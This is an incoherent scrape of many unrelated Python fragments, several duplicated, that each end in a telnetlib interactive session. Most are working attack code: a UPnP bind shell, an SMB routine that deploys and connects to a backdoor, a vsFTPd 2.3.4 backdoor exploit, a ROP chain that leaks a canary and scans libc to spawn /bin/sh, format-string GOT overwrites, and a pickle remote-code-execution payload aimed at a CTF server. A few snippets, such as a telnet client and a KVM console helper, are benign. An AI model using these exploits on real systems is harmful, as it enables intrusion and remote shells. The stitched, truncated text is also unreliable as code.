def upnpbind(ex_port=None):
location = search_device()
in_ip = get_internal_ip_address(location)
control_url = get_control_url(location)
ex_ip = get_external_ip_address(control_url)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((in_ip, 0))
s.listen(1)
in_addr = s.getsockname()
if ex_port:
ex_addr = (ex_ip, ex_port)
else:
ex_addr = (ex_ip, in_addr[1])
print >> sys.stderr, "[+] bind: %r" % (in_addr, )
add_port_mapping(control_url, ex_addr, in_addr)
try:
c, remote_addr = s.accept()
print >> sys.stderr, "[+] accept: %r" % (remote_addr, )
s.close()
t = Telnet()
t.sock = c
t.interact()
t.close()
finally:
delete_port_mapping(control_url, ex_addr)
def interact(self):
t = Telnet()
t.sock = self.sock
try:
t.interact()
finally:
close(s)
def upnpbind(ex_port=None):
location = search_device()
in_ip = get_internal_ip_address(location)
control_url = get_control_url(location)
ex_ip = get_external_ip_address(control_url)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((in_ip, 0))
s.listen(1)
in_addr = s.getsockname()
if ex_port:
ex_addr = (ex_ip, ex_port)
else:
ex_addr = (ex_ip, in_addr[1])
print >>sys.stderr, "[+] bind: %r" % (in_addr,)
add_port_mapping(control_url, ex_addr, in_addr)
try:
c, remote_addr = s.accept()
print >>sys.stderr, "[+] accept: %r" % (remote_addr,)
s.close()
t = Telnet()
t.sock = c
t.interact()
t.close()
finally:
delete_port_mapping(control_url, ex_addr)
def interact(s):
t = Telnet()
t.sock = s
try:
t.interact()
finally:
disconnect(s)
def listen(self, port=4444, echotest=False):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port)) # the empty string represents INADDR_ANY
s.listen(1)
if isinstance(self.p, Popen):
addrinfo = socket.getaddrinfo('localhost', port, socket.AF_INET,
socket.SOCK_STREAM)
host = addrinfo[0][4][0]
else:
host = self.p.getsockname()[0]
yield (host, port)
c, addr = s.accept()
s.close()
if echotest:
c.sendall(check_cmd + '\n')
sys.stdout.write(c.recv(8192))
t = Telnet()
t.sock = c
t.interact()
t.close()
self.close()
def listen(self, port=4444, echotest=False):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port)) # the empty string represents INADDR_ANY
s.listen(1)
if isinstance(self.p, Popen):
addrinfo = socket.getaddrinfo('localhost', port, socket.AF_INET, socket.SOCK_STREAM)
host = addrinfo[0][4][0]
else:
host = self.p.getsockname()[0]
yield (host, port)
c, addr = s.accept()
s.close()
if echotest:
c.sendall(check_cmd + '\n')
sys.stdout.write(c.recv(8192))
t = Telnet()
t.sock = c
t.interact()
t.close()
self.close()
def bindshell(self, port):
connected = False
srvname = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
local_file = os.path.join(keimpx_path, 'contrib', 'srv_bindshell.exe')
remote_file = '%s.exe' % ''.join([random.choice(string.ascii_lowercase) for _ in range(8)])
if not os.path.exists(local_file):
raise missingFile('srv_bindshell.exe not found in the contrib subfolder')
logger.info('Launching interactive OS shell')
logger.debug('Going to use temporary service %s' % srvname)
if not port:
port = 4445
elif not isinstance(port, int):
port = int(port)
self.deploy(srvname, local_file, port, remote_file)
logger.info('Connecting to backdoor on port %d, wait..' % port)
for counter in range(0, 3):
try:
time.sleep(1)
if str(sys.version.split()[0]) >= '2.6':
tn = Telnet(self.__dstip, port, 3)
else:
tn = Telnet(self.__dstip, port)
connected = True
tn.interact()
except (socket.error, socket.herror, socket.gaierror, socket.timeout) as e:
if connected is False:
warn_msg = 'Connection to backdoor on port %d failed (%s)' % (port, e)
if counter < 2:
warn_msg += ', retrying..'
logger.warn(warn_msg)
else:
logger.error(warn_msg)
except SessionError as e:
# traceback.print_exc()
logger.error('SMB error: %s' % (e.getErrorString(),))
except KeyboardInterrupt as _:
print()
logger.info('User aborted')
except Exception as e:
# traceback.print_exc()
logger.error(str(e))
if connected is True:
tn.close()
sys.stdout.flush()
break
time.sleep(1)
self.undeploy(srvname)
def interact(self): if self.state == 0: print "No connection available" return None else: from telnetlib import Telnet telnet = Telnet() telnet.sock = self.skt telnet.interact() return None
class TelnetClient:
DEFAULT_PORT = 23
def __init__(self, host, port=DEFAULT_PORT):
self.host = host
self.port = port
self.user = None
self.password = None
self.telnetInstance = None
def areCredentialsSet(self):
return self.user and self.password
def setCredentials(self, user, password):
self.user = user
self.password = password
def requestCredentials(self):
self.user = input('Ingrese usuario de [%s]: ' % self.host)
self.password = getpass()
def connect(self):
#Si aún no se han establecido solicitamos las credenciales (nombre de usuario y contraseña)
if not self.areCredentialsSet():
self.requestCredentials()
#Creamos una instancia de Telnet
self.telnetInstance = Telnet(self.host)
#Leemos todo el flujo de bytes hasta encontrar el mensaje Username: (solicitando que se ingrese)
self.readUntil('Username: '******'ascii') + b"\n")
if self.password:
self.readUntil('Password: '******'ascii') + b'\n')
self.executeCommand(self.password)
return True
return False
def executeCommand(self, command):
commandWithLineBreak = '%s\n' % command
self.telnetInstance.write(bytes(commandWithLineBreak, 'ascii'))
def readUntil(self, target):
self.telnetInstance.read_until(target.encode('ascii'))
def write(self, message):
self.telnetInstance.write(bytes(message, 'ascii'))
def interact(self):
self.telnetInstance.interact()
def printSession(self):
print(self.telnetInstance.read_all().decode('ascii'))
def telnetinteract(s=None):
if s is None: s = sock
with printer() as P:
while select.select([s], [], [], 0.1)[0]:
cc = s.recv(1)
if len(cc) < 1:
break # Maybe print socket is dead and exit instead.
P(cc)
from telnetlib import Telnet
t = Telnet()
t.sock = s
stderr.write('\n' + CYLW + '---telnet interact' + CRST + '\n')
t.interact()
def telnetinteract(s = None):
if s is None: s = sock
with printer() as P:
while select.select([s], [], [], 0.1)[0]:
cc = s.recv(1)
if len(cc) < 1:
break # Maybe print socket is dead and exit instead.
P(cc)
from telnetlib import Telnet
t = Telnet()
t.sock = s
stderr.write('\n'+CYLW+'---telnet interact'+CRST+'\n')
t.interact()
def exploit(payload):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect((host, port))
data = server.recv(1024)
server.send(payload + "\n")
#data = server.recv(1024)
print "[*] Starting"
t = Telnet()
t.sock = server
t.interact()
server.close()
def interact(self):
from telnetlib import Telnet
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._revHost, self._revPort))
s.listen(5)
cli = s.accept()[0]
s.close()
print("[+] Got connect-back")
t = Telnet()
t.sock = cli
t.interact()
def interact(self):
from telnetlib import Telnet
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._revHost, self._revPort))
s.listen(5)
cli = s.accept()[0]
s.close()
print("[+] Got connect-back")
t = Telnet()
t.sock = cli
t.interact()
def finalExploit():
print("[+] Triggering BOF to get a shell...")
from telnetlib import Telnet
t = Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((ip, port))
sleep(st)
s.recv(1024)
s.send(b"1")
sleep(st)
out = s.recv(1024)
t.sock = s
t.interact()
def interact(self, shell_fd=None):
check_cmd = b'echo "\x1b[32mgot a shell!\x1b[0m"' # green
buf = self.read()
sys.stdout.write(buf.decode())
if shell_fd is not None:
self.write(check_cmd + b'\n')
sys.stdout.write(self.read())
self.write(b"exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" %
{'fd': shell_fd})
t = Telnet()
t.sock = self.s
t.interact()
self.shutdown()
self.close()
def listen(self, port=0, is_shell=False):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(1)
yield s.getsockname()
c, addr = s.accept()
s.close()
if is_shell:
c.sendall(check_cmd + '\n')
sys.stdout.write(c.recv(8192))
t = Telnet()
t.sock = c
t.interact()
c.close()
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('<address here>', 5300))
data = read_until(sock, delim=b'? ')
for line in data.decode('ascii').splitlines():
print(line)
if "I ran" in line:
miles = line.split()[2]
runtime = line.split()[4]
min_time = '{0:02.0f}:{1:02.0f}'.format(
*divmod(get_sec(runtime) / int(miles), 60))
pace = str(min_time) + ' minutes/mile\n'
# pace = str(min_time)
pace = bytes(pace, encoding='utf-8')
print('sending:', pace)
sock.send(pace)
sock.sendall(b'\n')
t = Telnet()
t.sock = sock
t.interact()
sock.close()
def wait(self, redirect_fd=None):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
buf = self.read()
sys.stdout.write(buf)
if isinstance(self.p, Popen):
if redirect_fd is not None:
self.write(check_cmd + '\n')
sys.stdout.write(self.read())
self.write('exec /bin/sh <&2 >&2\n')
self.p.wait()
return self.p.returncode
else:
if redirect_fd is not None:
self.write(check_cmd + '\n')
sys.stdout.write(self.read())
self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" % {'fd': redirect_fd})
t = Telnet()
t.sock = self.p
t.interact()
t.close()
def interact(self, redirect_fd=None):
check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"' # green
self.setdisplay(False)
buf = self.read()
sys.stdout.write(buf)
if isinstance(self.p, Popen):
if redirect_fd is not None:
self.write(check_cmd + '\n')
sys.stdout.write(self.read())
self.write('exec /bin/sh <&2 >&2\n')
self.p.wait()
else:
if redirect_fd is not None:
self.write(check_cmd + '\n')
sys.stdout.write(self.read())
self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" %
{'fd': redirect_fd})
t = Telnet()
t.sock = self.p
t.interact()
t.close()
from telnetlib import Telnet tn = Telnet(host='locahost', port=5005) tn.interact()
maxtime = 0
bestchar = "-"
for trial in allowed:
query = known + trial + "U" * (7 - len(known))
print "Try ", query
start = time.time()
sock.send(query + '\n')
result = sock.recv(1024)
print("> " + result)
result = sock.recv(1024)
print("> " + result)
end = time.time()
tt = 1000 * (end - start)
print "Time = ", tt
if (tt > maxtime):
maxtime = tt
bestchar = trial
print "Keep ", bestchar
known += bestchar
print "Think it's ", known
sock.send(known + '\n')
result = sock.recv(1024)
print("> " + result)
t = Telnet()
t.sock = sock
t.interact()
sock.close()
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
skt.connect(('localhost', 65000))
read_until(skt, b'insert the password: '******'\n')
libc_base = get_libc_base(
str(leakage).split('your input: 0x')[1].split('AAAAA')[0])
print("[+] libc base address: ", hex(libc_base))
print("[!] sending root payload")
read_until(skt, b'insert the password: ')
skt.send(root_shell(libc_base))
#use telnet to interact
server = Telnet()
server.sock = skt
server.interact()
server.close()
def main():
payload = "davide"
payload += "B" * (1032 - len(payload))
print "Leaking canary",
canary = leak_n_bytes(payload, 8)
print "{}".format(hex(canary))
print "Leaking old RBP"
old_rbp = leak_n_bytes(payload + p64(canary ^ Ds), 8)
print "{}".format(hex(old_rbp))
print "Leaking return address"
ret_addr = leak_n_bytes(
payload + p64(canary ^ Ds) + p64(old_rbp ^ Ds) +
chr(ord("\xcf") ^ 0xd), 7)
print "{}".format(hex(ret_addr))
text_section_base = ret_addr & 0xfffffffffffff000
text_section_leave_ret = text_section_base + 0xc5c
buffer_addr = old_rbp - 0x480
gadget_pop_rsi_pop_r15_ret = text_section_base + 0xf71
gadget_pop_rdi_ret = text_section_base + 0xf73
gadget_pop_rdx_ret = text_section_base + 0xb53
text_section_write_got = text_section_base + 0x202020
text_section_write_plt = text_section_base + 0x910
# After leaking the necessary values,
# We create a new payload
payload = "davide" + "AA"
payload += p64(gadget_pop_rdi_ret ^ Ds)
payload += p64(0x4 ^ Ds)
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
payload += p64(text_section_write_got ^ Ds)
payload += p64(0x1337) # pop r15, dont-care
payload += p64(gadget_pop_rdx_ret ^ Ds)
payload += p64(0x8 ^ Ds)
payload += p64(text_section_write_plt ^ Ds)
# Pad to the end of buffer
payload += "B" * (1032 - len(payload))
payload += p64(canary ^ Ds)
payload += p64(buffer_addr ^ Ds)
payload += p64(text_section_leave_ret ^ Ds)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(SERVER)
s.recv(4096) # server hello
s.send(payload)
write_libc = s.recv(8)
print "write@libc:", hex(unpack(write_libc))
s.close()
# Libc scan
libc_page = unpack(write_libc) & 0xfffffffffffff000
page_size = 0x1000
dup2_start = "".join(
[chr(t) for t in [0xb8, 0x21, 0x00, 0x00, 0x00, 0x0f, 0x05]])
execve_start = "".join(
[chr(t) for t in [0xb8, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05]])
dup2_remote_addr = 0
execve_remote_addr = 0
# scan down
print "Scanning down"
while dup2_remote_addr == 0 or execve_remote_addr == 0:
try:
payload = "davide" + "AA"
payload += p64(gadget_pop_rdi_ret ^ Ds)
payload += p64(0x4 ^ Ds)
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
payload += p64(libc_page ^ Ds) # buffer = page
payload += p64(0x1337) # pop r15, dont-care
payload += p64(gadget_pop_rdx_ret ^ Ds)
payload += p64(page_size ^ Ds) # length
payload += p64(text_section_write_plt ^ Ds)
# Pad to the end of buffer
payload += "B" * (1032 - len(payload))
payload += p64(canary ^ Ds)
payload += p64(buffer_addr ^ Ds)
payload += p64(text_section_leave_ret ^ Ds)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(SERVER)
s.recv(4096) # server hello
s.send(payload)
page_data = s.recv(page_size)
if len(page_data) == 0:
break
if dup2_start in page_data:
dup2_remote_addr = libc_page + page_data.index(dup2_start)
print "Found dup2 @ {}".format(hex(dup2_remote_addr))
if execve_start in page_data:
execve_remote_addr = libc_page + page_data.index(execve_start)
print "Found execve @ {}".format(hex(execve_remote_addr))
s.close()
libc_page -= page_size # scan down
except EOFError:
break
# scan up
print "scanning up"
libc_page = unpack(write_libc) & 0xfffffffffffff000
while dup2_remote_addr == 0 or execve_remote_addr == 0:
try:
payload = "davide" + "AA"
payload += p64(gadget_pop_rdi_ret ^ Ds)
payload += p64(0x4 ^ Ds)
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
payload += p64(libc_page ^ Ds) # buffer = page
payload += p64(0x1337) # pop r15, dont-care
payload += p64(gadget_pop_rdx_ret ^ Ds)
payload += p64(page_size ^ Ds) # length
payload += p64(text_section_write_plt ^ Ds)
# Pad to the end of buffer
payload += "B" * (1032 - len(payload))
payload += p64(canary ^ Ds)
payload += p64(buffer_addr ^ Ds)
payload += p64(text_section_leave_ret ^ Ds)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(SERVER)
s.recv(4096) # server hello
s.send(payload)
page_data = s.recv(page_size)
if len(page_data) == 0:
break
if dup2_start in page_data:
dup2_remote_addr = libc_page + page_data.index(dup2_start)
print "Found dup2 @ {}".format(hex(dup2_remote_addr))
if execve_start in page_data:
execve_remote_addr = libc_page + page_data.index(execve_start)
print "Found execve @ {}".format(hex(execve_remote_addr))
s.close()
libc_page += page_size # scan down
except EOFError:
break
print "libc scan over"
text_section_close_plt = text_section_base + 0x960
# Final payload for remote shell
payload = "davide" + "AA" # address of that is buffer_start_addr
# close(0)
payload += p64(gadget_pop_rdi_ret ^ Ds) # first, we ret here <---- (
payload += p64(0x0 ^ Ds) # pop this to RDI
payload += p64(text_section_close_plt ^ Ds) # ret there
# close(1)
payload += p64(gadget_pop_rdi_ret ^ Ds) # return from above to here
payload += p64(0x1 ^ Ds) # pop this to RDI
payload += p64(text_section_close_plt ^ Ds) # ret there
# dup2(4,0)
payload += p64(gadget_pop_rdi_ret ^ Ds) # return from above to here
payload += p64(0x4 ^ Ds) # pop this to RDI (socket's FD)
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds) # ret to this gadget
payload += p64(0x0 ^ Ds) # pop rsi
payload += p64(0xdeadbeefdeadbeef) # pop r15 (dont care)
payload += p64(dup2_remote_addr ^ Ds) # call dup2
# dup2(4,1)
payload += p64(gadget_pop_rdi_ret ^ Ds) # return from above to here
payload += p64(0x4 ^ Ds) # pop this to RDI (socket's FD)
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds) # ret to this gadget
payload += p64(0x1 ^ Ds) # pop rsi
payload += p64(0xdeadbeefdeadbeef) # pop r15 (dont care)
payload += p64(dup2_remote_addr ^ Ds) # call dup2
# When back from dup2, load arguments for execve
payload += p64(gadget_pop_rdi_ret ^ Ds)
stack_bin_sh = buffer_addr + 224 # will be placed in a few line from now
payload += p64(stack_bin_sh ^ Ds)
# Second argument for execve = NULL
payload += p64(gadget_pop_rdx_ret ^ Ds)
payload += p64(0x0 ^ Ds)
# Third argument for execve = NULL
payload += p64(gadget_pop_rsi_pop_r15_ret ^ Ds)
payload += p64(0x0 ^ Ds)
payload += p64(0xdeadbeefdeadbeef ^ Ds)
# jump to execve
payload += p64((gadget_pop_rdx_ret + 1) ^ Ds)
payload += p64(execve_remote_addr ^ Ds)
# place /bin/sh on the stack
payload += "".join([chr(ord(t) ^ 0xd) for t in "/bin/sh"])
payload += chr(0x0 ^ 0xd) # terminating null
# Pad to the end of buffer
payload += "B" * (1032 - len(payload))
payload += p64(canary ^ Ds)
payload += p64(buffer_addr ^ Ds)
payload += p64(text_section_leave_ret ^ Ds)
sock = socket.socket()
sock.connect(SERVER)
sock.recv(4096) # server hello
sock.send(payload)
#interactive mode
t = Telnet()
t.sock = sock
print "Starting interactive session:"
t.interact()
sock.close()
def interact():
print "INTERACTIVE"
t = Telnet()
t.sock = r
t.interact()
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser = argparse.ArgumentParser()
parser.add_argument("host",
help="input the address of the vulnerable host",
type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user = "******"
password = "******"
tn = Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2 = Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
conn = Telnet('3.239.213.227', 27491)
mt = MT19937()
remain = None
bar = trange(40)
for i in bar:
conn.write(b'10\n' * 500)
for _ in range(500):
s = int(conn.read_until(b'\n').decode())
s = s & 1
for b in tobin(s)[:1] + [None] * 31:
remain = mt.add(b)
bar.desc = f'[o] Reconstruct - {remain} remain'
if remain == 0:
rec = mt.reconstruct('python')
break
bar.close()
bar = trange(1337)
for i in range(0, 1337, 100):
n = min(1337 - i, 100)
m = ''.join(f'{rec.getrandbits(32) % 10}\n' for _ in range(n))
conn.write(m.encode())
for _ in range(n):
res = conn.read_until(b'\n').decode().strip()
assert res == '.', res
bar.update(n)
conn.interact()
from telnetlib import Telnet
CN = Telnet('80.0.0.3', 5024)
print CN.interact()
def kvm_console(self, options):
client = Telnet(self.get_hypervisor().get_ips()[0], self.attr_value(key="kvm", subkey="console"))
client.interact()
0x75,
0xa8,
0x8a,
0x4e,
0x95,
0xda,
0xae,
0xd0,
0x1d,
0x59,
0xa5,
0xcb,
0xef,
0x76,
0x29,
],
dtype=np.uint8).reshape(4, 4)
print(states.shape)
for state in states:
if (state[:, 0] == first).all():
state = state ^ magic
print(state)
state = state.tobytes()
assert (len(state) == 16)
state = codecs.encode(state, 'base64').replace(b'\n', b'')
print(state)
remote.write(state + b'\n')
remote.interact()
exit(0)
def main():
coordinates = '51.492137,-0.192878 '
libc_setsockopt_offset = 0xea8e0
libc_system_offset = 0x3af40
libc_binsh_offset = 0x15ef08
strchr_got_offset = 0x505c
tn = Telnet(HOST, PORT)
stage = 0
while stage < 5:
try:
game(tn)
stage += 1
except:
del(tn)
tn = Telnet(HOST, PORT)
stage = 0
tn.read_until(b'TARDIS KEY: ')
tn.write(b'UeSlhCAGEp\n')
tn.read_until(b'Selection: ')
tn.write(b'11111111\x00')
print('wait for alarm')
time.sleep(3)
tn.write(struct.pack('L', 1431907181))
tn.write(b'11111111\xff')
tn.write(b'1\n')
tn.read_until(b'Selection: ')
tn.write(b'3\n')
tn.read_until(b'Coordinates: ')
tn.write(coordinates.encode())
tn.write('zzz%{}$p\n'.format(int((0xff8ce05c-0xff8cdc0c)/4-1)).encode())
tn.read_until(b'zzz')
base_addr = int(tn.read_some()[0:10].decode(), 16) - 0x1491
print('base addr : {}'.format(hex(base_addr)))
tn.read_until(b'Coordinates: ')
tn.write(coordinates.encode())
tn.write(b'zzzz')
tn.write(struct.pack('<I', base_addr+0x500c))
tn.write(b'%21$s\n')
tn.read_until(b'zzzz')
setsockopt_addr = struct.unpack('<I', tn.read_some()[4:8])[0]
print('setsockopt :{}'.format(hex(setsockopt_addr)))
libc_system = setsockopt_addr - (libc_setsockopt_offset - libc_system_offset)
libc_binsh = setsockopt_addr - (libc_setsockopt_offset - libc_binsh_offset)
print('system :{}'.format(hex(libc_system)))
strchr_got = base_addr + strchr_got_offset
print('strchr_got :{}'.format(hex(strchr_got)))
p = FormatStr()
p[strchr_got] = libc_system - 0x14 - 0x140000
tn.write(coordinates.encode())
tn.write(p.payload(20) + b'\n')
tn.read_until(b'Coordinates: ')
tn.read_until(b'Coordinates: ')
tn.write(b'/bin/sh\n')
tn.interact()
try:
skt.connect((self.host, 4444))
except socket.error, err:
print "[-] Error: %s" % err[1]
print "[-] Explotation failed\n[-] Daemon should be dead..."
return None
print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
res = skt.recv(1024)
if res:
if res.count('Microsoft Windows'):
print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
from telnetlib import Telnet
telnet = Telnet()
telnet.sock = skt
try:
telnet.interact()
except:
pass
skt.close()
print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
return None
skt.close()
print '[-] Explotation failed\nDaemon should be dead...'
if __name__ == '__main__':
if len(sys.argv) != 3:
print "*************************************"
print "* Coded by Sergio 'shadown' Alvarez *"
print "* [email protected] *"
print "*************************************"
print "Usage: %s host port" % sys.argv[0]
def interacc():
print "INTERACTIVE"
t = Telnet()
t.sock = proc
t.interact()
sock.send(flag)
sock.send(op)
libc_pointer = 0
import sys
for i in xrange(0, OUTPUT_SIZE):
c = sock.recv(1)
if not c:
sys.stdout.write('\n')
break
else:
sys.stdout.write('%02x ' % ord(c))
#sys.stdout.write(repr(c)[1:-1])
if i%8 == 7:
sys.stdout.write('\n')
sys.stdout.flush()
if 24 <= i < 32: # THIS IS OUR LIBC POINTER
libc_pointer += ord(c) << (8*(i-24))
from time import sleep
sleep(1)
libc_pointer += 5518181 # offset to magic gadget
sock.send(pack('<Q', 0x0000000000400be9) * 32)
sock.send(pack('<Q', libc_pointer))
from telnetlib import Telnet
t = Telnet()
t.sock = sock
print "take the wheel"
t.interact()
def kvm_console(self, options):
client = Telnet(self.get_hypervisor().get_ips()[0],
self.attr_value(key='kvm', subkey='console'))
client.interact()
p += b'q\x01' # memo[1] = 'sys'
p += b'h\x00h\x01h\x00s' # sys.modules['sys'] = sys.modules
p += b'csys\nget\n' # sys.modules.get
p += b'X\x02\x00\x00\x00os\x85' # push ('os',)
p += b'R' # push sys.modules.get('os')
p += b'q\x02' # memo[2] = os
p += b'h\x00h\x01h\x02s' # sys.modules['sys'] = os
p += b'csys\nsystem\n' # push os.system
payload = b'cat ../flag.txt'
p += b'X'
p += struct.pack('<I', len(payload))
p += payload
p += b'\x85' # push ('ls',)
p += b'R' # RCE!!!!!!!
p += b'.'
p = codecs.encode(p, 'base64')
p = p.replace(b'\n', b'')
# r = Telnet('localhost', 5421)
# r = Telnet('18.232.184.48', 5421)
r = Telnet('pysh1.balsnctf.com', 5421)
r.write(p + b'\n')
r.interact()
def _post_run(self):
r = self.command.result
i = count()
rows = list()
listening = list()
for h in r.hook_files:
sessions = h.remote_debug_sessions
if not sessions:
continue
for s in sessions:
state = s.state
is_listening = False
if state == 'listening':
is_listening = True
if not self._debug_:
state = state + '*'
row = [ i.next(), s.hook_name, s.pid, s.host, s.port, state ]
if s.state == 'connected':
row.append('%s:%d' % (s.dst_host, s.dst_port))
else:
row.append('-')
rows.append(row)
if is_listening:
listening.append(row)
if not rows:
m = "No remote debug sessions found for repository '%s'.\n"
sys.stdout.write(m % r.name)
return
header = ('ID', 'Hook', 'PID', 'Host', 'Port', 'State', 'Connected')
rows.insert(0, header)
k = Dict()
k.banner = (
"Remote Debug Sessions for Repository '%s'" % r.name,
"(%s)" % r.path,
)
if not self._debug_:
if len(listening) == 1:
k.footer = (
"(*) type 'evnadmin debug %s' "
"to debug this session" % self.command.name
)
elif len(listening) > 1:
# Ugh, this is highly unlikely and I can't think of a good way
# to handle it at the moment.
k.footer = '(*) multiple listeners?!'
k.formats = lambda: chain((str.rjust,), repeat(str.center))
k.output = sys.stdout
#k.special = '='
render_text_table(rows, **k)
if not self._debug_:
return
if len(listening) != 1:
return
from telnetlib import Telnet
listen = listening[0]
host = listen[3]
port = listen[4]
t = Telnet(host, port)
t.interact()
def interact(s):
print("[*] connect to remote")
t = Telnet()
t.sock = s
t.interact()
def interact(s):
print("[*] interactive mode")
t = Telnet()
t.sock = s
t.interact()
try:
skt.connect((self.host, 4444))
except socket.error, err:
print "[-] Error: %s" % err[1]
print "[-] Explotation failed\n[-] Daemon should be dead..."
return None
print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
res = skt.recv(1024)
if res:
if res.count('Microsoft Windows'):
print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
from telnetlib import Telnet
telnet = Telnet()
telnet.sock = skt
try:
telnet.interact()
except:
pass
skt.close()
print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
return None
skt.close()
print '[-] Explotation failed\nDaemon should be dead...'
if __name__ == '__main__':
if len(sys.argv) != 3:
print "*************************************"
print "* Coded by Sergio 'shadown' Alvarez *"
print "* [email protected] *"
print "*************************************"
def shell():
tn2 = Telnet(HOST, S_PORT)
tn2.interact()
